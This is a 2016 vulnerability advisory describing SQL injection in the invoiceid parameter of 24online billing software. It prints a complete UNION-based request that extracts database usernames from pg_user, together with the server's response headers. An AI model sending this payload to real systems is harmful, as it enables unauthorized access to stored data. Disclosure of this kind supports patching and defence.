24 Online 8.3.7 Build 9.0 SQL Injection
Posted on 05 July 2016
Software name: 24 online Version: 8.3.6 build 9.0 Vendor website: http://24onlinebilling.com Potentially others versions older than this are vulnerable too. Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The invoiceid GET parameter on <base url>/24online/webpages/myaccount/usersessionsummary.jsp in not filtered properly and leads to SQL Injection Authentication Required: Yes A non-privileged authenticated user can inject SQL commands on the <base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id> &fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss There is complete informational disclosure over the stored database. ----------------------------------- GET /24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=93043+UNION+ALL+SELECT+null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pg_user--+-&fromdt=06/05/2016%2019:37:44&todt=03/07/2016%2015:21:16 HTTP/1.1 Host: 10.100.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=5464B4DD2B003E1E73E34FF773CA7232; myaccountmenu_id=menu_5 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 03 Jul 2016 09:59:41 GMT Server: Apache Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html;charset=ISO-8859-1